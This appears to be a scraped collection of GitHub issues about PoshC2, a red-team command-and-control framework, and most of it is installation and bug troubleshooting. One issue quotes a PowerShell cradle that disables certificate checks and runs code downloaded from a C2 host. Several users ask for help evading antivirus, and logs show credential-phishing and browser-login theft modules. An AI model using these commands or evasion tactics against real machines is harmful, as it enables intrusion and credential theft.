nettitude / poshc2 Goto Github PK

Yaml is installed and I also installed via pipenv yet no joy on the service setup seeing it. I have added to bash profile the directory it shows installed
nickkilla@box:$ uname -a
Linux box 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
nickkilla@box:$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic
'nickkilla@box:$ sudo pip3 install pyyaml
WARNING: The directory '/home/nickkilla/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (3.12)
nickkilla@box:$ sudo python3 -m pipenv run pip install pyyaml
Creating a virtualenv for this project…
Pipfile: /home/nickkilla/Pipfile
Using /usr/bin/python3 (3.6.9) to create virtualenv…
⠇ Creating virtual environment...created virtual environment CPython3.6.9.final.0-64 in 504ms
creator CPython3Posix(dest=/home/nickkilla/.local/share/virtualenvs/nickkilla-vAbj4hxZ, clear=False, global=False)
seeder FromAppData(download=False, pip=latest, setuptools=latest, wheel=latest, via=copy, app_data_dir=/home/nickkilla/.local/share/virtualenv/seed-v1)
activators BashActivator,CShellActivator,FishActivator,PowerShellActivator,PythonActivator,XonshActivator

✔ Successfully created virtual environment!
Virtualenv location: /home/nickkilla/.local/share/virtualenvs/nickkilla-vAbj4hxZ
Creating a Pipfile for this project…
WARNING: The directory '/home/nickkilla/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Collecting pyyaml
Downloading PyYAML-5.3.tar.gz (268 kB)
|████████████████████████████████| 268 kB 16.1 MB/s
Building wheels for collected packages: pyyaml
Building wheel for pyyaml (setup.py) ... done
Created wheel for pyyaml: filename=PyYAML-5.3-cp36-cp36m-linux_x86_64.whl size=44229 sha256=30d9ed31d412870b00f0096e8366b9893bfc1ef8ac12907a63ef322141927f6c
Stored in directory: /tmp/pip-ephem-wheel-cache-j6rg_hts/wheels/b1/86/0d/10e6c39d3a2b85ba807d7657ee80f08cc16c03f2aa2adf8e46
Successfully built pyyaml
Installing collected packages: pyyaml
Successfully installed pyyaml-5.3
nickkilla@box:~$ sudo posh-service
Creating a virtualenv for this project…
Pipfile: /opt/PoshC2/Pipfile
Using /usr/bin/python3.8 (3.8.0) to create virtualenv…
⠏ Creating virtual environment...created virtual environment CPython3.8.0.final.0-64 in 594ms
creator CPython3Posix(dest=/root/.local/share/virtualenvs/PoshC2-KGSTtxLR, clear=False, global=False)
seeder FromAppData(download=False, pip=latest, setuptools=latest, wheel=latest, via=copy, app_data_dir=/root/.local/share/virtualenv/seed-v1)
activators BashActivator,CShellActivator,FishActivator,PowerShellActivator,PythonActivator,XonshActivator

✔ Successfully created virtual environment!
Virtualenv location: /root/.local/share/virtualenvs/PoshC2-KGSTtxLR
Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'
Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'
Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'
Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'`

PS C:\Users\Bob> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system
.net.webclient).downloadstring('https://172.16.0.216:443/adsense/troubleshooter/1631343?id=Ndks8dmsPld_bs')
Exception calling "DownloadString" with "1" argument(s): "The request was aborted: Could not create SSL/TLS secure
channel."
At line:1 char:82

• ... = {$false};IEX (new-object system.net.webclient).downloadstring('htt ...

•             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
  • FullyQualifiedErrorId : WebException

Running clean install of 4.7 (issue also appears in 4.6), no update script used. Only Config.py changes were IP address and port configuration for my setup.

root@posh # python --version  
Python 2.7.15rc1

C2Viewer.py, when run, will continuously print an empty newline to the console when the following conditions are met:

• No 'command returned against implant' messages have occurred since the C2Viewer.py script was started.
• A new c# implant checks in (tested with Sharp_x64.dll).

There is no anomalous output in the journal view of C2Server.py.

C2Viewer.py also prints an integer to the console when it starts, that seems to be related to the cumulative number of commands entered into ImplantHandler.py.

Payloads generated from clean 4.6 and 4.7 installs (no update script).

The v4 payloads seem to work fine, and the Sharp_x64.dll does as well.

Log Name:      Application
Source:        Windows Error Reporting
Date:          2/5/2019 9:17:30 AM
Event ID:      1001
Task Category: None
Level:         Information
Keywords:      Classic
User:          N/A
Computer:      Hinata
Description:
Fault bucket , type 0
Event Name: APPCRASH
Response: Not available
Cab Id: 0

Problem signature:
P1: rundll32.exe
P2: 10.0.17763.1
P3: c9fa47b6
P4: agent.dll <- renamed Posh_v2_x64.dll
P5: 0.0.0.0
P6: 5beb2a23
P7: c0000005
P8: 00001267
P9: 
P10: 

Analysis symbol: 
Rechecking for solution: 0
Report Id: 90ef0393-d5f4-4882-9a13-871d502952ed
Report Status: 100
Hashed bucket: 
Cab Guid: 0

Unfortunately, I just did a fresh reinstall of posh after removing everything for other issues literally an hour ago, right after your recent change to the dockerfile, and now it won't install for docker.

Step 1/6 : FROM kalilinux/kali-linux-docker
pull access denied for kalilinux/kali-linux-docker, repository does not exist or may require 'docker login': denied: requested access to the resource is denied

Furthermore, it says on their site at https://www.kali.org/docs/containers/official-kalilinux-docker-images/
"Please note, kalilinux/kali-linux-docker is the former official image, it’s no longer updated. Don’t use it."

[+] Error:
System.Management.Automation.CmdletInvocationException: Exception calling ".ctor" with "0" argument(s):

"This implementation is not part of the Windows Platform FIPS validated cryptographic algorithms."

When downloading files from implants, no checks are done to confirm if a file with the same name has previously been downloaded. This means the original file which was downloaded gets appended with the data from the new download.

Dependency issues resulting in mono problems which prevent payload generation when running the server.

When running posh as a service and using journalctl to view the logs (as per poshc2.service) if there are a lot of messages or lines then journalctl can suppress those messages resulting in incomplete information being logged to the console.

The full output is still logged to the database however.

The initial limit on linux mint/ubuntu appears to kickin around 3-4000 lines into a large file when being cat-ed, but it's rate limiting not line limiting so the value will vary.

Journalctl rate limiting can be adjusted in /etc/systemd/journald.conf, rate limiting can be turned off with a value set to 0 but be aware this is a system-wide change.

See below for more information:

• https://bani.com.br/2015/06/systemd-journal-what-does-systemd-journal-suppressed-n-messages-from-system-slice-mean/
• https://www.rootusers.com/how-to-change-log-rate-limiting-in-linux/

Install for docker does not work on Ubuntu 18. I am using the default Ubuntu 18 server from AWS, ami-06d51e91cea0dac8d. I have only run 5 commands on it so far: apt update, apt install docker.io, usermod -aG docker ubuntu, systemctl enable docker, systemctl start docker.

The script tries to do an apt-get update first instead of apt update, and it fails.

The 2 solutions would be either take this out and tell users to apt update first or (untested, but I ran it manually just before using this script) use apt instead of apt-get. When I comment the "apt-get" part out, the script works fine.

Here's the output with apt-get:

[+] Installing PoshC2

[+] Performing apt-get update
Reading package lists... Done
E: Could not open lock file /var/lib/apt/lists/lock - open (13: Permission denied)
E: Unable to lock directory /var/lib/apt/lists/
W: Problem unlinking the file /var/cache/apt/pkgcache.bin - RemoveCaches (13: Permission denied)
W: Problem unlinking the file /var/cache/apt/srcpkgcache.bin - RemoveCaches (13: Permission denied)

[+] Installing git & cloning PoshC2 into /opt/PoshC2
E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?
fatal: could not create work tree dir '/opt/PoshC2': Permission denied

[+] Copying useful scripts to /usr/bin
cp: cannot stat '/opt/PoshC2/resources/scripts/fpc': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-config': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-server': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-build': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-clean': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-service': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-log': No such file or directory
chmod: cannot access '/usr/bin/fpc': No such file or directory
chmod: cannot access '/usr/bin/posh-config': No such file or directory
chmod: cannot access '/usr/bin/posh': No such file or directory
chmod: cannot access '/usr/bin/posh-server': No such file or directory
chmod: cannot access '/usr/bin/posh-docker-build': No such file or directory
chmod: cannot access '/usr/bin/posh-docker-clean': No such file or directory
chmod: cannot access '/usr/bin/posh-service': No such file or directory
chmod: cannot access '/usr/bin/posh-log': No such file or directory

[+] Setup complete

output with apt-get update commented out:

[+] Installing PoshC2


[+] Installing git & cloning PoshC2 into /opt/PoshC2
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Suggested packages:
  git-daemon-run | git-daemon-sysvinit git-doc git-el git-email git-gui gitk gitweb git-cvs git-mediawiki git-svn
The following packages will be upgraded:
  git
1 upgraded, 0 newly installed, 0 to remove and 77 not upgraded.
Need to get 3912 kB of archives.
After this operation, 49.2 kB of additional disk space will be used.
Get:1 http://us-west-2.ec2.archive.ubuntu.com/ubuntu bionic-updates/main amd64 git amd64 1:2.17.1-1ubuntu0.5 [3912 kB]
Fetched 3912 kB in 0s (38.9 MB/s)
(Reading database ... 56851 files and directories currently installed.)
Preparing to unpack .../git_1%3a2.17.1-1ubuntu0.5_amd64.deb ...
Unpacking git (1:2.17.1-1ubuntu0.5) over (1:2.17.1-1ubuntu0.4) ...
Setting up git (1:2.17.1-1ubuntu0.5) ...
Cloning into '/opt/PoshC2'...
remote: Enumerating objects: 60, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (45/45), done.
remote: Total 2769 (delta 31), reused 33 (delta 15), pack-reused 2709
Receiving objects: 100% (2769/2769), 21.39 MiB | 40.41 MiB/s, done.
Resolving deltas: 100% (1848/1848), done.

[+] Copying useful scripts to /usr/bin

[+] Setup complete

EDIT: running the docker still doesn't work without a tweak.

ubuntu@ip-10-10-10-10:~$ posh-service
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-unit-files ===
Authentication is required to manage system service or unit files.
Authenticating as: Ubuntu (ubuntu)
Password: (there is none, it's a default AMI from AWS)

ubuntu@ip-10-10-10-10:~$ sudo posh-service
Failed to enable unit: Unit file poshc2-docker.service does not exist.
Failed to restart poshc2-docker.service: Unit poshc2-docker.service not found.

To fix the above, I had to run all posh commands with sudo.

Hey,
I'm getting the following error when I try to run posh-server or any command, really.

Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'

I've tried severally to install the module using but it seems to be installed already.

This is the result after running: pip install pyyaml.
Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (5.1.2)

HELP!

I changed the Kill Date using posh-config after starting the server, because I forgot to change it from the current date, then ran posh-stop-service and killed any remaining Posh processes completely. I rebooted the host machine so nothing was running. Even still, after restarting Posh, the config changes did not reflect; KD was still the current date and it did not read the config file. I had to run posh-update and it changed the config file back to default.

When downloading any file types with slightly large size (few MBs) following error is thrown:

Error downloading file:
ErrorDownload: Exception calling "UploadData" with "2" argument(s): "The request was aborted: The request was canceled."
Unknown error!
Input strings must be a multiple of 16 in length
Traceback (most recent call last):
File "C2Server.py", line 372, in do_POST
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
File "/opt/PoshC2/Core.py", line 69, in decrypt_bytes_gzip
data = aes.decrypt(data)
File "/root/.local/share/virtualenvs/PoshC2-KGSTtxLR/lib/python3.6/site-packages/Crypto/Cipher/blockalgo.py", line 295, in decrypt
return self._cipher.decrypt(ciphertext)
ValueError: Input strings must be a multiple of 16 in length

Symantec Endpoint Protection fails to detect the generated payload Posh64.exe but it is able to successfully detect and delete all of the Posh_v*.dll files.

https://www.symantec.com/security-center/writeup/2018-102316-1505-99?vid=56315

Any advice on tweaking this dll to avoid detection? It might be worth making some slight changes to the project to avoid SEP.

Thanks

Hi,
is there a way to handle old implants.
I've got 4 implants but after I updated posh to the new version and keeping the old version's config file and certs, non of the older implants is working.
I get this message : Error with SharpSocks or old implant connection - is SharpSocks running
..... (the visited links)
and the screen is all red.
if there is a way to take back all the old implant i'll be gratefull, because connecting back to all the implant on the client machines and trying to restart the process is a pain in the ass.

Thank you.
Bara.

@benpturner

PoshC2 is an internationally used product, yet uses confusing UK date formatting for its output and configuration.

https://xkcd.com/1179/

The international organisation for standardisation (ISO) has a worldwide accepted format for date formatting defined as part of ISO 8601 - This follows the following formatting:

YYYY-MM-DD HH:MM:SS

This becomes easier to sort in tables, easier to read in output and results in no ambiguity from any users of PoshC2.

So I'm confused by the documentation where it talks about VoidFunc and VoidFunc2 in the DLL payloads.

It makes sense that you'd have two entry points so that you can do PowerShell v2 downgrade.

What I don't understand is now, there are Posh_v2_x64.dll and Posh_v4_x64.dll in my payloads directory, but they both still have the same pair of entry points.

I tried it out, and when invoked manually from a test system with rundll32.exe the implants call back, with VoidFunc returning the Implant-Core.ps1 warning about logging and AMSI, and VoidFunc2 lacking those warnings. But the behavior is the same, seemingly, between the two DLLs.

Can we get some clarity on what the difference between these DLLs is, and why the v2 even has the VoidFunc2 entry point to begin with? Shouldn't it only have VoidFunc and only return the v2 PowerShell environment?

With a otherwise normally running implant, I can't seem to understand what I'm supposed to do in order to use the sharpsocks proxy.

The docs say that a command of the form
SharpSocks -Uri https://www.c2.com:443 -Beacon 2000 -Insecure
is supposed to get me up and running.

However, substituting my C2 server for the -uri (which is what I think I'm supposed to put there, the doc is unclear), I get

[-] Loading Assemblies

And then nothing.

If I just write 'sharpsocks' however, a seemingly fully automatic routine kicks in, which assembles the following invocation. (I'm fine with the key leak, this is just a temp testing instance):

Sharpsocks -Client -Uri https://192.168.10.3 -Channel mgjMOcupaHiHIyATayeYHSTsN -Key RRC1DX0CZqqh4PCEHD4yC/fMRW9VX+AW/iEl8S1qKMI= -URLs api/v1/socks5/,api/v1/socks/ -Insecure -Beacon 2000

Which results in:

[-] Loading Assemblies

[+] SharpSocks client Started!

URLs:
https://192.168.10.3/api/v1/socks5/
https://192.168.10.3/api/v1/socks/
Channel: mgjMOcupaHiHIyATayeYHSTsN
Key being used: RRC1DX0CZqqh4PCEHD4yC/fMRW9VX+AW/iEl8S1qKMI=
Beacon: 20
Cookies: ASP.NET_SessionId __RequestVerificationToken
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36


[-] Run StopSocks to stop the client!

That seems like it is working, but the issue is that I can't seem to find what port on the C2server's host I'm supposed to direct traffic through to take advantage of the proxy. Issuing ss -npl on my C2 host doesn't show any new listening ports.

Any input on what I'm missing/doing wrong would be a big help.

On a Powershell Implant, ive tried typing in:
Running Poshc2 5.2 via Launcher.hta

LoadModule Invoke-MS16-032.ps1
LoadModule PPID-Spoof.ps1

But when i try invoke these methods, it says cmdlet not recognized. What could be the problem here?

You don't create the posh-stop-service on Ubuntu when installed with the docker script.

ubuntu@host:~$ posh-stop-service
posh-stop-service: command not found

It's a problem because you also can't disable the service with sudo systemctl ; see below

ubuntu@host:~$ ps -ef | grep posh
ubuntu   26159 26145  0 00:18 pts/0    00:00:00 /bin/bash /usr/bin/posh-service
ubuntu   26164 26159  0 00:18 pts/0    00:00:00 systemctl enable poshc2-docker.service
ubuntu   26258 26145  0 00:26 pts/0    00:00:00 grep --color=auto posh
ubuntu@host:~$ sudo systemctl disable poshc2-docker.service
Failed to disable unit: Unit file poshc2-docker.service does not exist.

It doesn't show with systemctl list-units --type=service either. I had to kill -9 the process.

Hi,

I am getting the below error while starting C2Server.py (python). I tried on on Kali with Python 2.7.15 running..

Error:-

Initializing new project folder and database

Traceback (most recent call last):
File "C2Server.py", line 423, in
initializedb()
File "/opt/PoshC2_Python/DB.py", line 96, in initializedb
conn = sqlite3.connect(Database)
sqlite3.OperationalError: unable to open database file

PoshC2 version: 5.1
Linux: Ubuntu 18.04

I tried run-exe after "loadmodule", but it doesn't work.
Then I found a blog post (https://labs.nettitude.com/blog/introducing-poshc2-v5-0/).
Looks like it has been changed to or . I tried both and it still failed.

What is the command the run the module?

Running posh-service or posh-server without sudo doesn't work on Ubuntu 18, having something to do with "polkit" Authorization Manager not allowing systemctl calls. But once you accidentally run it without sudo it gets stuck because the prompt won't exit properly with Ctrl+C out of the polkit prompt (it puts all prompts on the same line and won't show typing).

The Auth Manager thing isn't PoshC2's problem but it could be avoided by telling users to run all commands with sudo or from a root prompt.

I had a 4.5 version. I downloaded and setup a new verson 4.6.
Nothing of payloads is not working. At startup payload in C2Server.py window no connection information is displayed and in ImplantHandler.py window no implant, but in version 4.5 all worked.

In Config.py I changed HostnameIP on that has issued the ifconfig command on my interface.
Why not work?

Remove this line for all python versions less that 2.7.9 when running a python implant only.

ssl._create_default_https_context=ssl._create_unverified_context

There is an issue with the SharpImplant continuing to run in some situations which has not been fully bottomed out. There are a few ways the implant can be destroyed but some have adverse effects on the host process and therefore has not been performed. Further work here is required to find the solution to best kill an active C# implant. The work around is to inject into processes that are only running the Implant and then Kill that process using taskkill or similar code using start-process with args.

Hello friends,
Undoubtedly one of the most invested and best tools available today!
The only problem, in the last year, ןitis strongly identified in the antivirus engines and thus in fact can not work with in a real environment.
Do you have any idea what to do?

I had an error where PoshC2 server was complaining about no "Crypto" library when implants were coming in on PoshC2 v5.2. It was causing implants to fail.

For a temp fix I found running:
python3 -m pipenv run pip uninstall pycrypto
Then:
python3 -m pipenv run pip install pycryptodome

Did the trick.

I just want to confirm if the payloads is working for anyone? I've disabled all AV etc. tried running on Windows7 and Windows10.

None of the sharp payloads seem to work for me, however, powershell all fine.

PoshC2 Version: 5.1 - 21553fa 2019-12-07
Loaded Module: SharpChrome.exe

Used Command:
loadmodule SharpChrome.exe - Module loaded successfully
run-exe SharpChrome.Program SharpChrome logins - The term is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

I tried other module ( SharPersist, seatbelt) and it gave me same result. ( it can't recognize run-exe )

The output-to-html function is truncating my logs. How do I see the truncated data?

Thanks!!

Output isn't pretty like the PSH version of Posh.

Running on Ubuntu 16.04 with Python 3.8.

Everything works okay, but when I try to generate a report I get the following error:

Error: module 'cgi' has no attribute 'escape'

Exception calling "WriteAllBytes" with "2" argument(s): "Access to the path 'c:\users\public\videos' is denied."
At line:536 char:13

•         [io.file]::WriteAllBytes($Destination, $fileBytes)
  

• CategoryInfo : NotSpecified: (:) [], MethodInvocationException
• FullyQualifiedErrorId : UnauthorizedAccessException

The above error happens in PS implant, when you try to upload a file. However, within the same directory, one can create a new file with echo test > test.txt and when listed, it's there, in the same folder, which means you do have access to write to that path.

If you get this error after installing PoshC2 try creating a virtualenv in python and re-install the requirements. Make sure you deactivate when you've finished in this virtualenv.

pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt

Decryption error: You must not use 8-bit bytestrings unless you use a text_factory that can interpret 8-bit bytestrings (like text_factory = str). It is highly recommended that you instead just switch your application to Unicode strings.

When running in French with an accent, e.g Système. Fix required in C2Server line

newImplant = Implant(IPAddress, implant_type, Domain,USER, Hostname, Arch, PID, Proxy)

Using 4.7, if I run download-file on a file, and then try to delete it from the remote host, I get a locking error from PowerShell

Command issued against implant 23 on host ALPHA 0METALAB (03/13/2019 05:56:36)
rm GUID.txt

Command returned against implant 23 on host 0METALAB\user @ ALPHA (03/13/2019 05:56:37)

rm : Cannot remove item C:\Users\user\GUID.txt: The process cannot access the file 'C:\Users\user\GUID.txt'
because it is being used by another process.
At line:1 char:1
+ rm GUID.txt
+ ~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\user\GUID.txt:FileInfo) [Remove-Item], IOException
    + FullyQualifiedErrorId : RemoveFileSystemItemIOError,Microsoft.PowerShell.Commands.RemoveItemCommand

Sometimes I can shake this off by running other PoshC2 commands, but not always.

When setting the end date of payloads in Posh there is no warning in the framework when the kill date has been set in the past (e.g. you're on an engagement and forget to edit the date and can't get anything to come back because you've not been paying attention). Is there any way a warning/error message could be shown to help with debugging?

Hey Ben,

Would it be OK to get Rasta's CSharp implementation of Sherlock (which is now deprecated) into Posh pls? I see lots of other CSharp assemblies are making their way in too :)

https://github.com/rasta-mouse/Watson

Thanks!

Hi,
It is been a while that I'm using this awesome tool, which has been lately so popular.
but I'm facing some problems with detection (windows defender at least has became aware).
o I decided to modify the code but I could not understand how the b64 files in Files directory are created, it seems that they are already compiles and encoded. Could someone give us the source code of these files and how to modify them ?

thank you.

How do I use a real SSL cert with Posh?

Thanks

Environment:

Latest Kali Linux, (fully updated)
PoshC2, (Pulled from Git today)

Whenever triggering Autorun Modules for new implants I receive the following errors, even though the modules run fine when run manually on the Implant through the ImplantHandler.

In the Server window, when a new Implant stages the and the Autorun tasks start, the following is output:

Output from failed Autorun....

Task 00003 (autoruns) issued against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:24)
loadmodule Stage2-Core.ps1


Task 00004 (autoruns) issued against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:24)
cred-popper.ps1

Task 00003 (autoruns) returned against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:25)
Module loaded sucessfully

Task 00004 (autoruns) returned against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:26)

ErrorCmd: The term 'cred-popper.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

It appears to be a case of the Autorun function lower casing the command for storage as issuing the command "autorun LoadModule Cred-Popper.ps1" returns "add-autorun: loadmodule cred-popper.ps1". The successful Autorun, (Task003), which is part of the automated Staging process shows that the "Stage2-Core.ps1" is correctly capitalised but the user added Autorun, (Task004), is not working.

However, when run directly on the Implant, by running the command "cred-popper", the Task completes successfully with a correctly capitlaised command, "Cred-Popper.ps1" and the following is output in the C2Server window:

Output from successful run via Implant....

Task 00005 issued against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
loadmodule Cred-Popper.ps1


Task 00006 issued against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
cred-popper 


Task 00005 returned against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
Module loaded sucessfully

Task 00006 returned against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:09)


[+] Cred-Popper started in background runspace

Run Get-Creds to obtain the output, when the user enters their credentials

Not all of the Autoruns are broken, for example the "get-screenshot" command runs without problem, but from what I can tell all the modules in the PoshC2_Python/Modules fail:

Output from working Autorun module....

Task 00009 (autoruns) issued against implant 3 on host VICTIM\User* @ VICTIM (05/08/2019 20:37:51)
get-screenshot

Task 00009 (autoruns) returned against implant 3 on host VICTIM\User* @ VICTIM (05/08/2019 20:37:55)
Screenshot captured: /root/PoshC2_Project/downloads/VICTIM-05082019203755_jTXC3xWK9drEtkL.png

I've tried lowercasing the PowerShell script name to "cred-popper.ps1", which bypasses the error being thrown in the Task but the function appears to silently fail, so if anyone has any ideas for workarounds they'd be greatly appreciated!

Just like we have [SharpSocks] next to implants running the socks proxy any chance we can have [Daisy] next to implants running daisy? Makes remembering which implants are performing pivoting a little easier ;-)

When using a C# implant, the operator is unable to download files that are in use by the target OS.

Silent mastadon on Slack reported that Posh_v4_x64.dll is flagged by AVG free whereas the v4.1 version is not. We should investigate the differences and try and fix it.

I got this error after 20 min after activating a session, and then it goes down:
`'NoneType' object has no attribute 'replace'
Traceback (most recent call last):
File "C2Server.py", line 325, in do_POST
cookieVal = (s.cookieHeader).replace("SessionID=", "")
AttributeError: 'NoneType' object has no attribute 'replace'

'NoneType' object has no attribute 'replace'
Traceback (most recent call last):
File "C2Server.py", line 325, in do_POST
cookieVal = (s.cookieHeader).replace("SessionID=", "")
AttributeError: 'NoneType' object has no attribute 'replace'`

If an implant connects back with a POST rather than a GET, the last seen time doesn't get updated.

Hello,

I was having trouble setting the project directory and getting the posh-docker-server to use the intended project directory.

After checking the files I found that there is a discrepancy between the config file being used by the docker version and the non-docker version.

The docker version is using Config.py to get the variables of the project path and the non-docker version is using config.yml

The posh-config file edits the Config.py file:

The posh-docker-server uses the Config.py file:

But the posh-server called by the posh-docker-server when starting the docker uses the config.yml file:

I don't know if this is a change from newer versions, but there is a mismatch on the correct config file to use.

Workaround: to make it use the project folder defined by me, I had to change the config file config.yml to my needs.

Hi,

I'd like to join the advertised slack channel, for questions as well as to contribute but it requires a nettitude email address, is it possible (and desired) to have this opened up?

Thanks